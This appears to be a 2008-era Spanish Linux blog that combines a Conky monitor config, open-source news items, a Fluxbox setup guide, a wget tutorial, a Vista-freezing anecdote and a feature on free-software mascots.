${color}Ubuntu ${color}${fs_used /}/${fs_size /}${alignr}${color #c0c0c0}${fs_bar 5,120 /}

${color #FFFFFF}CPU Activos:
${color #FFFFFF}Name PID CPU% MEM%
$color ${top name 1} ${top pid 1} ${top cpu 1} ${top mem 1}
$color ${top name 2} ${top pid 2} ${top cpu 2} ${top mem 2}
$color ${top name 3} ${top pid 3} ${top cpu 3} ${top mem 3}
$color ${top name 4} ${top pid 4} ${top cpu 4} ${top mem 4}
$color ${top name 5} ${top pid 5} ${top cpu 5} ${top mem 5}

${color #FFFFFF}RAM Activos:
$color ${top_mem name 1} ${top_mem pid 1} ${top_mem cpu 1} ${top_mem mem 1}
$color ${top_mem name 2} ${top_mem pid 2} ${top_mem cpu 2} ${top_mem mem 2}
$color ${top_mem name 3} ${top_mem pid 3} ${top_mem cpu 3} ${top_mem mem 3}
$color ${top_mem name 4} ${top_mem pid 4} ${top_mem cpu 4} ${top_mem mem 4}
$color ${top_mem name 5} ${top_mem pid 5} ${top_mem cpu 5} ${top_mem mem 5}

${color #FFFFFF}Ethernet: eth0 - ${addr eth0}
${color #FFFFFF}Net Down:$color ${downspeed eth0} k/s${color #FFFFFF} ${offset 62}Net Up:$color ${upspeed eth0} k/s
${color #FFFFFF}${downspeedgraph eth0 32,150 104E8B FFFFFF} $alignr${color #FFFFFF}${upspeedgraph eth0 32,150 104E8B FFFFFF}
${color #FFFFFF}WIFI: ath0 - ${addr ath0}
${color #FFFFFF}Net Down:$color ${downspeed ath0} k/s${color #FFFFFF} ${offset 62}Net Up:$color ${upspeed ath0} k/s
${color #FFFFFF}${downspeedgraph eth1 32,150 104E8B c0c0c0} $alignr${color #FFFFFF}${upspeedgraph ath0 32,150 104E8B FFFFFF}

${color #FFFFFF}Port(s)${alignr}#Connexiones
$color ALL: ${alignr}$color ${tcp_portmon 1 65535 count}
$color html: ${alignr}$color ${tcp_portmon 80 80 count}
$color sshd: ${alignr}$color ${tcp_portmon 22 22 count}
$color replicator: ${alignr}$color ${tcp_portmon 8080 8080 count}

${color #FFFFFF}Puerto(s)${alignr}#INPUT
${color #FFFFFF}Direccion Remota ${alignr} Local Service/Port$color
${tcp_portmon 1 65535 rhost 0} ${alignr} ${tcp_portmon 1 65535 lservice 0}
${tcp_portmon 1 65535 rhost 1} ${alignr} ${tcp_portmon 1 65535 lservice 1}
${tcp_portmon 1 65535 rhost 2} ${alignr} ${tcp_portmon 1 65535 lservice 2}
${tcp_portmon 1 65535 rhost 3} ${alignr} ${tcp_portmon 1 65535 lservice 3}
${tcp_portmon 1 65535 rhost 4} ${alignr} ${tcp_portmon 1 65535 lservice 4}
${tcp_portmon 1 65535 rhost 5} ${alignr} ${tcp_portmon 1 65535 lservice 5}
${color #FFFFFF}Puerto(s)${alignr}#INPUT
${color #FFFFFF}Direccion Remota ${alignr} Local Service/Port$color ${tcp_portmon 1 65535 rhost 0} ${alignr} ${tcp_portmon 1 65535 rservice 0}
${tcp_portmon 1 65535 rhost 1} ${alignr} ${tcp_portmon 1 65535 rservice 1}
${tcp_portmon 1 65535 rhost 2} ${alignr} ${tcp_portmon 1 65535 rservice 2}
${tcp_portmon 1 65535 rhost 3} ${alignr} ${tcp_portmon 1 65535 rservice 3}
${tcp_portmon 1 65535 rhost 4} ${alignr} ${tcp_portmon 1 65535 rservice 4}
${tcp_portmon 1 65535 rhost 5} ${alignr} ${tcp_portmon 1 65535 rservice 5}

Una vez pegado guardamos y escribimos en el terminal : conky
y ya tendreis vuestro monitor del sistema listo para usar ;)
Podeis encontrar más archivos de configuración en su pagina Oficial


Firefox 3: juntos hicimos el récord posible!

8 millones de descargas en 24 horas!

Como se puede leer en Mozillazine.org al igual que lo hicieran en el lanzamiento de Firefox 2 en 2006, el equipo de IE le ha enviado una tarta (la de la izquierda de la foto) a Mozilla en reconociminento por el lanzamiento de Firefox 3. No tiene desperdicio la que les mandaron en el 2006 todavía sobrevive (a la derecha en la foto) .

Como colgar Window$ Vista en 10 segundos

La seguridad de Vista no tiene igual, me gustaría que alguien me dijera como colgar Linux o Mac en 10 segundos. Pues bien, en Vista es tan facil como presionar dos teclas durante 10 segundos, Alguien da más?
El proceso es así de simple presionar la tecla "Window$" (esa que tiene el símbolo de las ventanitas en una bandera flameante) en conjunto con la tecla "E" por 10 segundos, aproximadamente, hará que Explorer se abra infinitamente y el sistema dejará de responder.

Micro$oft patrocinara un proyecto de software libre

Micro$oft ha decidido patrocinar el proyecto de codigo abierto Cencus. Ha declarado que patrocinara el proyecto “para conocer al enemigo”. Algunos expertos han comentado que podría ser un acercamiento a la anunciada apertura al código abierto y la interoperabilidad.

Open Source Census, es un nuevo proyecto que realiza un seguimiento de la utilización de las aplicaciones de código abierto en las empresas mundiales.

Census es una herramienta valiosa sobre todo para empresas, mostrando públicamente amplias estadísticas de la adopción del código abierto. Desde el comienzo del rastreo se han reportado más de 220.000 paquetes en 1.300 máquinas analizadas y con el tiempo se espera que muestre lo subestimado que está el código abierto.

Ubuntu se fusiona con GoUbuntu

Canonical, empresa patrocinadora del proyecto Ubuntu ha anunciado una fusión de Ubuntu con GoUbuntu. Goubuntu es el sistema operativo de Canonical 100% libre, es decir con esta nueva fusión, los usuarios tendremos la posibilidad de escoger instalar un Ubuntu tal cual hemos instalado o instalar una version de Ubuntu 100% LIBRE (GoUbuntu).

Microsoft se queja del monopolio Google-Yahoo!

Microsoft ha exigido del regulador estadounidense de competencia, la vigilancia sobre la anunciada alianza Google+Yahoo!, advirtiendo de la concentración del 90% del mercado publicitario online que la unión supondría.

Según Reuters, Microsoft ya se habría puesto en contacto con lobbys políticos de Washington, iniciando una campaña de oposición al acuerdo de colaboración publicitaria entre las firmas de Internet rivales. Este acuerdo “limitaría las opciones de anunciantes y editoriales y destruiría una competencia alternativa”, argumentan desde Redmond.

Por si acaso Google y Yahoo! han decidido voluntariamente retrasar entre tres y cuatro meses la puesta en marcha de su alianza mientras el Departamento de Justicia de EE UU toma una decisión. Incluso el Senado estadounidense también revisará el acuerdo.

La verdad es que existen suficientes razones para la queja, lo que es llamativo es que quien se queje sea la misma Empresa acusada y condenada por prácticas monopólicas.

Linux, el siguiente paso hacia la evolución

Otro anuncio linuxero más ;)

Minibuntu 8.04 y 7.10, otra versión ligera de Ubuntu

Crealabs ha liberado Minibuntu, una distribución ligera basada en Ubuntu Hardy Heron y que es LiveCD.
Esta distribución de tan solo 138Mb (7.10) o 144 Mb (8.04) viene con todo lo necesario para funcionar.

Una vez que la hayas descargado puedes utilizar las herramientas Ubuntu Customization Kit o Reconstructor para reconstruirla con tus aplicaciones favoritas.


Para descargarla os dejo los siguientes enlaces:
Minibuntu 8.04 (i386) (MD5)

Solo disponible en 32 bits

Instalar y Configurar Fluxbox en Ubuntu

Para aquellos que no lo conozcais Fluxbox es un gestor de ventanas para el Sistema X Window basado en Blackbox 0.61.1. Su objetivo es ser ligero y altamente personalizable, con sólo un soporte mínimo para iconos, gráficos, y sólo capacidades básicas de estilo para la interfaz. Se utilizan atajos de teclado, tabs, y menús simples como interfaces, los cuales pueden ser editados.

Este fin de semana me he puesto a trastear y he decidido instalar un nuevo gestor de ventanas en mi portatil, ya que cuando trabajo uso Netbeans y Firefox y se comen toda mi RAM.

Así que hoy os voy a contar como instalar y configurar fluxbox en Ubuntu.
Lo primero que quiero comentaros es que fluxbox no es un gestor de ventanas habitual como GNOME,KDE o XFCE, es mucho más ligero y mucho más configurable, aunque tambien más tedioso al principio. Eso sí, lo podeis tener para usar paralelamente a GNOME,KDE o el entorno que utiliceis.

Lo primero es instalarlo:
sudo aptitude install fluxbox fluxconf

Ahora una vez instalado tenemos que crear nuestro menú contextual,que hará las veces de menú de inicio.
Por defecto la instalación de Fluxbox nos vendrá en ubuntu con un escritorio vacío con una barra que simplemente puede mostrar la hora, los escritorios y la lista de ventanas.
Así que para editar el menú lo haremos de la siguiente manera:

gedit ~/.fluxbox/menu

Y como contenido del fichero pondremos lo siguiente:

[begin] (Fluxbox) {} <>
[encoding] () {UTF-8} <>
[exec] (HOME) { thunar $HOME} <>
[exec] (Terminal) {gnome-terminal} <>
[exec] (Firefox) {firefox} <>
[exec] (Opera) {opera} <>
[exec] (Synaptic) {/usr/bin/gksu /usr/sbin/synaptic} <>
[submenu] (Red) {} <>
[submenu] (Navegadores) {} <>
[exec] (firefox) {firefox} <>
[exec] (opera) {env QT_XFT=true opera} <>
[end]
[submenu] (Mensajería) {} <>
[exec] (Ekiga) {/usr/bin/ekiga} <>
[exec] (pidgin) {pidgin} <>
[exec] (aMsn) {amsn} <>
[end]
[submenu] (eMail) {} <>
[exec] (evolution) {evolution} <>
[end]
[submenu] (P2P) {} <>
[exec] (amule) {amule} <>
[end]
[end]
[submenu] (Navegador Archivos) {} <>
[exec] (nautilus) {nautilus --no-desktop --browser} <>
[end]
[submenu] (Multimedia) {} <>
[submenu] (Graficos) {} <>
[exec] (gimp) {gimp} <>
[end]
[submenu] (Audio) {} <>
[exec] (rhythmbox) {rhythmbox} <>
[exec] (amarok) {amarok} <>
[exec] (alsamixer) {Eterm -e alsamixer} <>
[end]
[submenu] (Video) {} <>
[exec] (gmplayer) {gmplayer} <>
[exec] (vlc) {vlc}
[end]
[end]
[submenu] (Oficina) {} <>
[exec] (Geany) {/usr/bin/geany} <>
[exec] (emma) {/usr/bin/Emma} <>
[exec] (gedit) {gedit} <>
[exec] (GNOME Screenshot Tool) {/usr/bin/gnome-panel-screenshot} <>
[exec] (OO Base) {oobase} <>
[exec] (OO Calc) {oocalc} <>
[exec] (OO Writer) {oowriter} <>
[end]
[submenu] (Juegos) {} <>
[exec] (gnometris) {gnometris} <>
[exec] (sol) {sol} <>
[exec] (wormux) {wormux} <>
[end]
[submenu] (Fluxbox menu) {} <>
[config] (Configuracion) {} <>
[submenu] (Estilos...) {Choose a style...} <>
[stylesdir] (/usr/local/share/fluxbox/styles) {} <>
[end]
[submenu] (Estilos personalizados...) {Choose a style...} <>
[stylesdir] (~/.fluxbox/styles) {} <>
[end]
[workspaces] (Workspace List) {} <>
[submenu] (Herramientas) {} <>
[exec] (fluxconf) {fluxconf} <>
[exec] (fluxkeys) {fluxkeys} <>
[exec] (fluxmenu) {fluxmenu} <>
[exec] (Window name) {xprop WM_CLASS|cut -d \" -f 2|xmessage -file - -center} <>
[exec] (Screenshot - JPG) {import screenshot.jpg && display -resize 50% screenshot.jpg} <>
[exec] (Screenshot - PNG) {import screenshot.png && display -resize 50% screenshot.png} <>
[exec] (Ejecutar) {fbrun } <>
[end]
[restart] (Restart) {} <>
[separator] () {} <>
[exit] (Exit) {} <>
[end]
[submenu] (Apagado) {}
[exec] (Apagar) {if Xdialog –yesno “Apagar: Seguro?” 6 30; then sudo halt; fi} <>
[exec] (Reiniciar) {if Xdialog –yesno “Reiniciar: Seguro?” 6 30; then sudo reboot; fi} <>
[exit] (Salir) {} <>
[end]
[end]
[endencoding] () {} <>
[end]

Este es un fragmento de mi menú vosotros podeis añadir cualquier programa que querais al vuestro poniendo:
[exec] (Nombre_Programa) { Comando } <>
y la orden
[submenu] (Nombre) {} .... [end] Simplemento agrupa un conjunto de programas

Una vez tenemos nuestro menú configurado, ya tenemos un entorno funcional de fluxbox, y podemos acceder a él cerrando sesión Ctrl + Alt + <-- y en el Sesión > Fluxbox.

Ahora si vais a trabajar con Fluxbox hay una serie de carpetas que debereis crear en caso de que no existan y tener en cuenta que son:

~/.fluxbox
Es el directorio de configuración personal de Fluxbox en nuestro home
~/.fluxbox/backgrounds
Es el subdirectorio donde podemos colocar nuestros fondos de escritorio. Una buena idea es convertirlo en un enlace simbólico al directorio donde tengamos los fondos en nuestro home, para evitar una duplicidad de archivos. Los estilos antiguos con fondo de escritorio utilizan este subdirectorio para la ubicación de los mismos.
~/.fluxbox/pixmaps
Al igual que el anterior es un subdirectorio de ubicación de archivos gráficos personalizados, utilizado por los estilos anteriores al nuevo formato.
~/.fluxbox/styles
Es el subdirectorio de nuestro estilos personalizados y todos aquellos que encontremos en internet.
~/.fluxbox/fbrun_history
Es el archivo que almacena el historial de los comandos ejecutados con fbrun.
~/.fluxbox/init
Es el archivo de configuración del inicio de Fluxbox, en la línea:
~/.fluxbox/keys
Es el archivo de configuración de los atajos de teclado de Fluxbox
~/.fluxbox/menu
Es el archivo de configuración del menú de Fluxbox
~/.fluxbox/startup
Es el script de inicio donde podemos personalizar y añadir aplicaciones al inicio de Fluxbox

Muy bien, ya os he comentado las carpetas de configuración de Fluxbox, ahora vamos a personalizar un poco el entorno.

Primero vamos a poner un fondo de pantalla que nos aparezca cada vez que iniciemos fluxbox y esto lo haremos editando el archivo
./fluxbox/starup y añadiendo la linea :
fbsetbg -f /home/tu_usuario/.fluxbox/fondo.jpg

Otra cosa bastante importante es añadir al inicio un gestor de conexiones de red, sobre todo si tenemos wireless y lo haremos de la siguiente manera:

Editamos el archivo con el que fluxbox arranca las aplicaciones al inicio:
gedit .fluxbox/init

y modificamos la línea de rootCommand así:
session.screen0.rootCommand: nm-applet &

Después de esto ya podeis empezar a investigar y modificar vuestro Fluxbox, este ha sido mi resultado:

En estas páginas teneis temas para añadir a la carpeta
~/.fluxbox/styles para meterle los estilos personalizados

box-look
fluxbox.sourceforge.net

Que con el menú que os he pasado podeis acceder a ellos en
Menu Fluxbox > Estilos personalizados...

Y aquí os dejo un manual más completo que me ha servido a mi de guía:
Manual


Google Anuncia Google Gadgets para Linux!

Google ha anunciado el lanzamiento oficial de Desktop Gadgets para Linux y está distribuyendo el código fuente bajo licencia Apache. Aunque todavía hay errores y la puesta en práctica todavía no está del todo completo, funciona lo suficientemente bien como para el día a día.

Desktop Gadgets es una de las principales características de la suite de Google Desktop, que también incluye un mecanismo de búsqueda. Los Gadgets son applets pequeños, interactivoa, orientados al web a los que el usuario puede colocar en el escritorio o en una barra lateral. Google publica una API completa para Gadgets que permite a terceros desarrolladores de software crear componentes para la plataforma.


Lanzamiento de Opera 9.5

Pocos días antes de que esté disponible Mozilla Firefox 3.0, asistimos a la noticia del lanzamiento de Opera 9.5, el completo navegador web gratuito, que no libre. Podemos encontrar en su ftp las versiones para distintos sistemas operativos y arquitecturas, aunque parece que aun no hay versiones internacionalizadas para Linux, FreeBSD y algunas otras plataformas, estando sólo disponible, por el momento, en inglés. ¿Creéis que Opera será competencia para la nueva versión de Mozilla Firefox?
Desde mi opinión personal Opera ha hecho un buen trabajo con este nuevo navegador, ya que proporciona un entorno muy amigable y viene con los plugins necesarios preinstalados. Aunque en cuanto al consumo de recursos tal vez sea un poco elevado.

Liberada la nueva versión de Linux Mint

El domingo pasado fueron liberadas las versiones Linux Mint 5.0 y Linux Mint 5.0 (Light) , las cuales llevan por nombre “Elyssa”. Linux Mint 5 Elyssa es derivada de Ubuntu 8.04 Hardy Heron, una de las grandes diferencias entre ambas distros es:

La forma en que se presenta el escritorio, el lema de Linux Mint dice, “de la libertad a la elegancia”, lo cual convierte a Linux Mint en la distribución Linux con un escritorio bastante elegante.

Red Star un linux social-ista

Desde tierras suramericanas nos llega Red Star, una distribución GNU/Linux basada en Debian para uso general.

Esta distribución busca reencontrar el origen inicla de Linux y evitar la denegación del espíritu original del Linux con distros comerciales como Xandros, SuSe, Linspire, OpenSolaris, etc. Uno de sus objetivo es acercar GNU/Linux Debian a la popularidad en Latinoamérica, pero desde un compromiso social; facilidad y efectividad técnica, sin usar el Marketing como cree Red Star Linux hace en parte Ubuntu.

Se inicia desde Live CD con opción de instalación en disco duro en no más de 20 minutos y de una manera muy sencilla. La distribución está basada en el poder de Slax y la popularidad de Debian y contiene 2.5 Gb de un “arsenal” de Software Libre, programas todoterreno, desde navegación anónima, criptografía, ofimática, edición de audio, video, auditoria, seguridad y hasta juegos… configurados, y listos para ser usados fácilmente, comprimidos sólo en un CD-Rom de 700 Mb.

Por defecto usa el popular y veterano escritorio KDE 3.5 pero se puede seleccionar Fluxbox, dado su caracter para usar máquinas antiguas.

Telefonos móviles + maiz = Palomitas recien hechas

Yo no sé si los móviles dan cancer o si son malos para la salud o que, pero desde luego después de ver este video no me apetece que le pase eso a mi cerebro.

Como descargar contenidos de una web desde consola

Esta mañana he tenido la necesidad de descargarme todo el contenido de una web que tenía elementos que necesitaba y aquí os dejo una explicación de como hacer esto y alguna función extra más que interesante:


Hoy os voy a hablar de uno de esos comandos maravillosos que hace tanto o más que un programa gráfico, estamos hablando de wget, comando que nos permitirá bajarnos webs enteras, archivos, bajar algo de un ftp, etc, pero sobre todo veremos como construirnos una especie de p2p para poder continuar las descargas siempre que nos apetezca.

Lo primero un pequeño resumen de las principales opciones de wget:

1.Descargar una página web o un fichero:

  • wget http://www.servidor.com/fichero.zip

2.Guardar la información que aparece por pantalla en un fichero de log:

  • wget -o log.txt http://www.servidor.com/fichero.zip

3.Para obtener más información sobre la descarga:

  • wget -d http://www.servidor.com/fichero.zip

4.Para que haga la descarga sin mostrar ningún log:

  • wget -q http://www.servidor.com/fichero.zip

5.Descargar las URLs que aparezcan en un fichero:

  • wget -i urls.txt

6.Continuar una descarga que se cortó:

  • wget -c http://www.servidor.com/fichero.zip v

7.Descargar algo que requiere usuario y clave:

  • wget –http-user=usuario –http-passwd=clave http://www.servidor.com/fichero.zip

8.Aparentar ser un navegador distinto:

  • wget --user-agent=Opera http://www.servidor.com/fichero.zip

9.Descargar una página con todos los elementos gráficos, javascript, etc:

  • wget -p http://www.servidor.com

10.Descargar toda una web:

  • wget -r http://www.servidor.com

11.Descargar hasta tres niveles de profundidad de una web:

  • wget -r –level=2 http://www.servidor.com

12.Descargar un archivo de un ftp:

  • wget ftp://ftp.servidor.com/fichero.zip
Bien, ¿y cómo podemos descargar algo muy grande siempre que nos apetezca?. Para mayor comodidad primero crearemos un directorio para albergar todas nuestras descargas:

    mkdir descargaswget

Y entramos en él:

    cd descargaswget/

Ahora creamos un archivo con nuestro editor favorito:

    nano archivo

Y dentro del mismo escribimos lo siguiente:

    wget -c www.servidor.com/archivoquenosqueremosbajar

Lo siguiente es hacerlo ejecutable:

    chmod +x archivo

Y siempre que queramos seguir bajándolo, entraremos en el directorio que hemos creado y lo ejecutaremos:

    ./archivo

Las mascotas del software libre

¿Con cual de estas mascotas?

Cada proyecto de software libre tiene su mascota que dice mucho de su filosofía.

Ñu – GNU

Un Ñu es el animal representativo del proyecto GNU ya que GNU significa “Ñu” en inglés. El nombre GNU no se adoptó porque a la persona que comenzó el proyecto (Richard Stallman) le gustase particularmente este animal sino porque GNU es un acrónimo recursivo que quiere decir "GNU's Not Unix."

Mono - Proyecto Mono

Mono es tanto el nombre como el animal representativo como de un proyecto que pretende ser una implementación libre de la plataforma .Net.

Los creadores del proyecto explican que eligieron el nombre de Mono simplemente porque les gustan los monos (antes de crear Mono ya habían fundado una empresa llamada Ximian, palabra muy parecida a “Simian” -Simio-).

Delfín – MySQL

El delfín que es parte del logo de MySql se llama Sakila. Según los creadores de MySql, este delfín representa los valores de la compañía y de la base de datos: rapidez, precisión, potencia y naturalidad.


Camello - Perl

El camello es la imagen del lenguaje Perl desde que apareciese por primera vez en el libro "Programming Perl", curiosamente, el camello de Perl tiene derechos de autor (la editorial O’Reilly).


Bonobo - Gnome

Mientras que el Bonobo es una especie de Chimpancé en el mundo animal, en el mundo del software libre es la arquitectura que utiliza GNOME para la creación y uso de componentes.

Su nombre es de nuevo elección de la gente de GNOME (Miguel de Icaza y compañia) que ya bautizaron a su desarrollo de la plataforma .Net como Mono.

Elefante - PHP y PostgreSQL

Un elefante es la mascota de los proyectos PHP y PostgreSQL.

No hemos llegado a averiguar si el elefante es la mascota oficial de PHP o si la comunidad de software libre se lo asignó. El elefante representa la robustez y potencia de este lenguaje de programación y gestor de bases de datos.

Panda Rojo – FireFox

FireFox es el navegador del proyecto Mozilla. El animal que les representa es un FireFox cuya traducción literal sería zorro de fuego, pero en realidad un firefox es un precioso y raro animal que se llama panda rojo.

¿Por qué se eligió un nombre tan especial? La historia es larga:
El navegador comenzó llamándose Mozilla Phoenix pero a petición de la empresa Phoenix Technologies, que posee un navegador para sistemas digitales, el nombre se cambió a FireBird. El nombre Mozilla FireBird trajo también problemas porque dicho nombre ya era usado por otro proyecto de software libre, por lo que finalmente en Febrero del 2004 se eligió el nombre FireFox.

Vaca - Gentoo Linux

Gentoo Linux es una distribución de GNU/Linux bastante reciente. Larry se llama esta vaca que según la página oficial estaba un poco frustrada por el estado actual de las Distribuciones de Linux... hasta que probó Gentoo Linux.

Por otra parte, un Gentoo es un pingüino, cuyo nombre, traducido a español es pingüino de pico rojo y que habita en las islas sub-Antárticas.

Caballo - Anjuta

Anjuta es un Entorno de desarrollo para C/C++ versátil, escrito para GTK. Esta vez, Anjuta no es un nombre recursivo como GNU o Linux, sino el nombre de la novia del desarrollador que comenzó Anjuta: Naba Kumar, así que puede considerarse la aplicación dedicada a ella. Sobre el caballo, lo más que podemos afirmar es que quiere representar la potencia y utilidad de este software.

Pingüino (Tux) - Linux

La idea de Tux surgió del propio Linus Torvalds; según cuenta, de pequeño le mordió un pingüino en Australia y desde entonces le pareció un animal simpático.

No hay un origen claro del nombre "Tux"; algunos dicen que proviene del inglés Tuxedo que significa esmoquin (siempre se ha dicho que los pingüinos van de esmoquin) y otros dicen que el nombre es una mezcla de Torvald con Unix.

Tux es la mascota oficial del sistema operativo Linux y el animal más famoso y conocido dentro del software libre; tan famoso es que ha llegado a protagonizar videojuegos, entre otros el "Tux Racer".

Cigüeña - GNU/LinEx

La cigüeña es el animal que representa a LinEx, una distribución basada en Debian creada en Extremadura como proyecto educativo.

Se eligió por ser un ave característica de la Comunidad.

La cigüeña de LinEx es una de las estrellas del software libre en España y está volando lejos para demostrar que aquí también nos interesa este software.

Pitón – Python

Una pitón es el animal estandarte de este lenguaje de programación de alto nivel. Curiosamente, al creador de este lenguaje ( Guido van
Rossum) no le gustan precisamente estos animales. La explicación del nombre del lenguaje por el propio autor es: El nombre del lenguaje viene del espectáculo de la BBC Monty Python's Flying Circus y no tiene nada que ver con desagradables reptiles.

Camaleón - Suse Linux

Geeko; así se llama el simpático camaleón que es la mascota de la compañía alemana Suse. El nombre fue elegido tras un concurso en el que participaron miles de personas y proviene del término Geek (http://es.wikipedia.org/wiki/Geek) que se podría traducir al castellano como friki.

"Un camaleón es un animal que se adapta a su entorno, igual que Linux", explica Gerhard Burtscher, CEO de SuSE Linux AG. "La vista del camaleón es aguda y está constantemente enfocada - ¡al igual que nuestra visión, la cual está dirigida hacia el Código Abierto!-".

Godzilla – Mozilla

Godzilla es un popular (y ficticio) animal con aspecto de tiranosaurio proveniente de la mitología Asiática y es la mascota del proyecto Mozilla que es una suite de Internet (Navegador, correo, editor de webs).

El nombre de Mozilla surgió de la unión de Mosaic y Gozilla.

Mosaic fue el primer navegador Web; cuando un grupo de los creadores originales de Mosaic fundaron Netscape bautizaron como Mozilla las versiones previas de su futuro navegador Navigator. Mozilla pasó a ser el nombre de la mascota de esta compañía y más tarde, cuando Netscape liberó el código fuente de su suite Communicator, pasó a ser el nombre de la organización encargada de crear un navegador basado en software libre a partir del código fuente del Navigator.

Gimp - Gimp

Wilber es la mascota de GIMP (GNU Image Manipulation Program) fue creada en 1997 por Thomas Kuosmanen y Wilber es un… gimp. A menudo se confunde con un zorro o un ratón pero según su creador, Wilber es simplemente un gimp.



Espero que os haya gustado el Zoo del software libre ;)